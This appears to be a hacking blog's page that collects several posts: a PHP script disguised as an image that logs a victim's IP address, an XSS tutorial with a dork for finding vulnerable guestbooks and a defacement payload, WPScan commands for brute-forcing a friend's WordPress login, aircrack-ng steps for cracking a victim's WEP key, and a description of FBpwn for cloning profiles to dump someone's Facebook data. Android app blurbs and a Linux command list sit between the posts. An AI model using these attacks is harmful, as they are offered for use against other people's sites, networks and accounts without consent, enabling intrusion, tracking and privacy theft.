How To Grab Someone's Ip Address ( Advanced and Professional Way )


I will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

Copy the below codes into Notepad and save it as Grab.php (.php is must)

<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
 
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
 
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
 
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>

Now make Free account on any of the free web hosting sites Ripway,000webhost or on My3gb You Can also Google Some Other .

Now upload Grab.php to your web hosting site.

Copy the link of your uploaded file and send it to victim.

As soon as victim will click on your link his ip will be saved in your free web hosting site.

If Any Problem Or Questions Comment Below...!!!
Enjoy you are Done !! 


I hope you like this post please share it to many people ..!! :)
Read More

What is XSS ( Cross Site Scripting) & How To Perform XSS


Okay, in this tutorial We aim to give you a very basic understanding of cross-site scripting, also known on XSS. We advise you do this on Mozilla's Firefox web browser or Google Chrome, as newer versions of Internet Explorer edit the site to prevent XSS.

Finding your target.
Obviously, before you can hack a site, you need to find a site vulnerable to what you want to do, in this case, XSS. We can do this using a search engine. I recommend Google  What we want to search is A Vulnerable XSS Site By Using The Dork Below:

Quote: inurl:guestbook html enabled


What you should see as a list of results is many websites containing "guestbooks". A guestbook is a page of website, where users may leave comments, it is recommended the guestbook you choose doesn't send posts for moderation before they are publically shown.

Is my target vulnerable?
To find this out, we need to do a small XSS test. Doing this is simple. Go into the guestbook and add a post. In the comment/content/post box, send the following line of code.

Quote: "><script>alert("Vulnerability Test")</script>

If the site is vulnerable, a popup window saying "Vulnerability Test" will appear.

Injecting HTML.
Now we want to take advantage of the XSS vulnerability. Type in the following:

Quote: 
"><script>alert("I have hacked your site")</script>
<!--Hacked By (Your name)-->
(Message to the viewer)
[Any other HTML code you would like to add]

You can put as much HTML as you want in it, and if you have a good understanding of HTML, you can edit the page itself, but I won't go into that, as this is just a basic XSS Tutorial.

I hope you understood and learned something from Our tutorial. Any questions? Comment Below!


I hope you like this post please share it to many people ..!! :)


Read More

WebSploit Toolkit

WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability

[+] Autopwn - Used From Metasploit For Scan and Exploit Target Service.
[+] wmap - Scan,Crawler Target Used From Metasploit wmap plugin.
[+] format infector - inject reverse & bind payload into file format.
[+] phpmyadmin - Search Target phpmyadmin login page.
[+] lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF.
[+] apache users - search server username directory (if use from apache webserver).
[+] Dir Bruter - brute target directory with wordlist.
[+] admin finder - search admin & login page of target.
[+] MLITM Attack - Man Left In The Middle, XSS Phishing Attacks.
[+] MITM - Man In The Middle Attack.
[+] Java Applet Attack - Java Signed Applet Attack.
[+] MFOD Attack Vector - Middle Finger Of Doom Attack Vector.
[+] USB Infection Attack - Create Executable Backdoor For Infect USB For Windows.


I hope you like this post please share it to many people ..!! :)
DOWNLOAD HERE

Read More

How To Find Vulnerability In Joomla Website ( Backtrack / Kali Linux )

Joomla! Vulnerability Scanner

Joomscan Security Scanner is a vulnerability scanner for the Joomla!
First Open Your backtrack and Follow these path
Applications->Backtrack->Vulnerability Assessment->Web Application assessment->CMS vulnerabilities identification->Joomscan
Now type ./joomscan.pl -u example.com -x localhost:8080





I hope you like this post please share it to many people ..!! :)
Read More

Uniscan 7 Nikto Web Scanners Backtrack / Kali Linux


Uniscan scanner

Uniscan is a web vulnerability scanner written in perl language,it comes with a variety of scanning techniques.

It is mostly used by black hat means hacker's because its very easy in usage and any can be familiar with it in just a minute it comes built in Backtrack 5.

Uniscan is a simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner.
It has many options like:

-h ( for help )
-u ( for confirming a target like -u www.target.com )
-b ( Order uniscan to go background when the scanning will start )
-q ( For Enable Directory Checks )



Nikto scanner

Nikto Web Scanner is a Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software and other problems. It performs generic and server type specific checks. It also captures and prints any cookies received.

The Nikto code itself is Open Source (GPL), however the data files used to drive it are not.
Chris Sullo, the CFO of Open Security Foundation has written this scanner for vulnerability assessment.


DOWNLOAD NIKTO

I hope you like this post please share it to many people ..!! :)
Read More

All Commands For Backtrack / Kali Linux

Below Are Some Basic Commands for Backtrack,Kali Linux,Ubuntu And Other Linux Systems
Note: The Bold Texts starting From A to X are the Commands :) Please Share,Comment :)

A
alias Create an alias •
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian/Ubuntu)
aptitude Search for and install software packages (Debian/Ubuntu)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index
B
basename Strip directory and suffix from filenames
bash GNU Bourne-Again SHell
bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop •
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)
C
cal Display a calendar
case Conditionally perform a command
cat Concatenate and print (display) the content of files
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
chkconfig System services (runlevel)
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command - ignoring shell functions •
continue Resume the next iteration of a loop •
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts
D
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes •
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls'
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
dmesg Print kernel & driver messages
du Estimate file space usage
E
echo Display message on screen •
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands •
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions
F
false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fg Send job to foreground
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros
fuser Identify/kill the process that is accessing a file
G
gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groupadd Add a user security group
groupdel Delete a group
groupmod Modify a group
groups Print group names a user is in
gzip Compress or decompress named file(s)
H
hash Remember the full pathname of a name argument
head Output the first part of file(s)
help Display help for a built-in command •
history Command History
hostname Print or set system name
I
iconv Convert the character set of a file
id Print user and group id's
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes
J
jobs List active jobs •
join Join lines on a common field
K
kill Stop a process from running
killall Kill processes by name
L
less Display output one screen at a time
let Perform arithmetic on shell variables •
ln Create a symbolic link to a file
local Create variables •
locate Find files
logname Print current login name
logout Exit a login shell •
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files
M
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
mtools Manipulate MS-DOS files
mtr Network diagnostics (traceroute/ping)
mv Move or rename files or directories
mmv Mass Move and rename (files)
N
netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
notify-send Send desktop notifications
nslookup Query Internet name servers interactively
O
open Open a file in its default application
op Operator access
P
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data •
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory
Q
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas
R
ram ram disk device
rcp Copy files between two machines
read Read a line from standard input •
readarray Read from stdin into an array variable •
readonly Mark variables/functions as readonly
reboot Reboot the system
rename Rename files
renice Alter priority of running processes
remsync Synchronize remote files via email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)
S
screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.'
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
suspend Suspend execution of this shell •
symlink Make a new name for a file
sync Synchronize data on disk with memory
T
tail Output the last part of file
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command •
U
ulimit Limit user resources •
umask Users file creation mask
umount Unmount a device
unalias Remove an alias •
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
uptime Show uptime
useradd Create new user account
userdel Delete a user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode
V
v Verbosely list directory contents (`ls -l -b')
vdir Verbosely list directory contents (`ls -l -b')
vi Text Editor
vmstat Report virtual memory statistics
W
wait Wait for a process to complete •
watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Search the user's $path, man pages and source files for a program
which Search the user's $path for a program file
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')
wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user
X
xargs Execute utility, passing constructed argument list(s)
xdg-open Open a file or URL in the user's preferred application.
yes Print a string until interrupted


I hope you like this post please share it to many people ..!! :)

Read More

Hack Wordpress Website in Backtrack / Kali Linux

HACK WORDPRESS BLOG USING WPSCAN IN BACKTRACK OR KALI LINUX

WPScan.rb is a nifty bit of program that allows you to scan WordPress sites for information as well as do some fun stuff.Say for example you want to "hack" into your friends WordPress site :-)...or just get some information, whatever.

I'm using BackTrack 5 r3 for this tutorial but you can use kali linux for this they are similar

Step1: You can use it to enumerate usernames, so you can see what usernames are valid on the WordPress site by running this command:


ruby ./wpscan.rb --url www.friends-site.com --enumerate u


Running this command against a real WordPress site will show something like this
Step2:
Now that you know what the usernames are, you can then try to brute force it with a list of passwords. This process takes a while, and you have to have a word list. BackTrack 5 r3 comes with a decent word list, so I'll use that in this example.

ruby ./wpscan.rb --url www.friends-site.com --wordlist /pentest/passwords/wordlists/darkc0de.lst --username admin


The above command is telling WPScan to attack your friends URL, using the username "admin" with the word list that is located in the /pentest/passwords/wordlists/ folder of Back Track 5.


You can even add threading to make the process a little faster by using this switch: --threads 50
There are a few more things you can do, including scanning for what plugins the site uses, as well as telling you which ones are vulnerable.

If You don't Have " WPSCAN " Download It From Their Website

Happy WordPress Hacking!!

Below I Kept The Download Links for The Required Things You Will Need In This Tutorials

Download Backtrack 5R3 32bit
Download Backtrack 5R3 64bit
Download Kali Linux 32 Bit

Download Kali Linux 64 Bit

I used The Default Word List in Backtrack Incase, i am giving you a 1.1 million word list...


DOWNLOAD 1.1MILLION WORD LIST

Also Read : HOW TO DEFACE WORDPRESS WEBSITES
Click to Like Our Facebook Page
Read More

Face Swap ( Swap Two Faces for Android )

Ever wanted to swap two faces in a photo? Now you can! Face Swapper instantly lets you swap all two faces in your photos! Face swap makes it so easy to switch faces that anyone can do it ina matter of seconds. Morph one person into another for everyone's entertainment!
How it works

Simply take a photo(s), or choose a photo from your albums, and select the face area of the 2 faces you want to swap and click the swap button and Face Swapper does the rest.... Simply the most realistic face swapping app on the marketplace today!
Face Swap apkFace Swap apk

Possible uses for multi-image:
- Swap your face with your girlfirend, friend, mother, father or any relative!
- Swap your face with a picture of a baby!
- Swap the faces of two of your friends and show them around!
- Swap the faces of two family members!


DOWNLOAD HERE
I Hope You Like This Post

Read More

Go Cleaner ( Best Cleaner App For Android )

GO Cleaner and Task Manager 3.51 Apk Files For Android

Cleaner & Task Manager - 40,000,000+ people are using GO Cleaner & Task Manager! It is the must-have tool to monitor and kill apps, clean cache, free memory and speed up your android phone! The most advanced task killer app from GO Launcher team who you could trust. Make your phone faster and securer.
GO Cleaner and Task Manager apk

Free Features
- One click to kill running tasks and free memory
- Delete private records of your online and off-line activities, such as browsing data, search records, call logs, etc.
- Clean cache to speed up your phone
- Clear Apk rubbish to release more space for your phone

Read More

Memory Booster ( Optimize Your RAM in Your Android Device )

Memory Booster - RAM Optimizer 5.6 Apk Files For Android

Memory Booster is a powerful mobile memory & RAM boosting tool specially designed for Android smartphone and tablet users. It is designed to tackle the difficult yet crucial problem of memory management for all Android devices. Memory Booster reclaims lost memory for your programs by defragmenting your smartphone's memory and recovering memory leaks from poorly behaved applications. Supported languages: English, Korean, Japanese, Traditional Chinese, Simplified Chinese, Italian, French, Russian, Spanish, German, Turkish
Memory Booster - RAM Optimizer apk

Features:
* Real-time Memory Status Report & Monitor
Memory Booster provides a live chart to demonstrate your device's total/free memory and current memory usage.
* One-click Quick Memory Boosting
Besides automatic memory boosting, 

Read More

Hotspot VPN Shield For Android FREE..!!!

Requirements: Android 2.0 - 4.1
Overview: FREE VPN for your Android Device! with Unlimited Bandwidth!

Currently supports Android 2.x/4x OS devices only.
Hotspot Shield for Android provides the same great features as our popular desktop software which has been downloaded 60 million times:
PROVIDES INTERNET SECURITY & PRIVACY: protect yourself in Wi-Fi hotspots (VPN encrypts all traffic); protect your identity and your IP address to stop unwanted tracking.
GIVES YOU ACCESS to your favorite sites: Unblock any blocked content and services--get Facebook, Skype, YouTube, Flickr and other sites wherever you are.
BLOCKS & NOTIFIES you of spam, phishing and rogue websites. (ELITE subscription* only)

SAVES YOU $$: Hotspot Shield Bandwidth Compression speeds up browsing and shows you how much you saved on your data plan. Hotspot Shield has already saved 37 million MB of bandwidth for its mobile users. (ELITE subscription only)
OFFER MARKETPLACE: Gives you opportunity to download apps, complete easy offers and surveys to get Hotspot Shield ELITE for Android or desktop and hundreds of other items like gift cards and Facebook credits absolutely free!
*Monthly and Annual ELITE Subscriptions Available. All subscriptions provide Unlimited VPN Bandwidth and No Ads.

NOTE: Before starting Hotspot Shield VPN - if you have other installed VPN clients, please be sure that they are disconnected.
NOTE: If you see the "Uninstall" button on the application main screen and if you plan to uninstall the app - please tap on this button to uninstall the application. If there is no "Uninstall" button on the screen - please use your usual way to uninstall application.



Read More

FBpwn Hacker (Facebook)

What is FBpwn?
A cross-platform Java based Facebook social engineering framework, sends friend requests to a list of Facebook profiles, and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information,photos and friend list to a local folder. Extensible module interfaces and built-in modules for advanced social engineering tricks.

A typical hacking scenario starts with gathering information from a user's FB profile. The plugins are just a series of normal operations on FB, automated to increase the chance of you getting the info.

Typically, first you create a new blank account for the purpose of the test. Then, the friending plugin works first, by adding all the friends of the victim (to have some common friends). Then the clonning plugin asks you to choose one of the victims friends. The cloning plugin clones only the display picture and the display name of the chosen friend of victim and set it to the authenticated account. Afterwards, a friend request is sent to the victim's account. The dumper polls waiting for the friend to accept. As soon as the victim accepts the friend request, the dumper starts to save all accessable HTML pages (info, images, tags, ...etc) for offline examining.

After a a few minutes, probably the victim will unfriend the fake account after he/she figures out it's a fake, but probably it's too late!


Read More

Hack WEP WiFi In Backtrack / Kali Linux

  • Hello everyone
Today I will show you how to hack wireless wep key with Aircrack-ng
Let's start :) 

Open terminal:
airmon-ng
airmon-ng stop [your interface] [My is wlan0]
airodump-ng [your interface] [My is wlan0]
airodump-ng --channel [Victim channel] --write wep --bssid [Victim BSSID] [your interface] [My is wlan0]                           **Attention not close this terminal **

Open new terminal:
aireplay-ng -1 0 -a [Victim BSSID] [your interface] [My is wlan0]                          
**Attention wait for the recognize router :-) **

Open new terminal:
aireplay-ng -3 -b [Victim BSSID] [your interface] [My is wlan0]                  
               **Attention not close this terminal **                             

Open new terminal:
aircrack-ng wep-01.cap
**Attention Wait to collect 5000 packets and start Aircrack-ng attack**

I Hope You Like This Post


Read More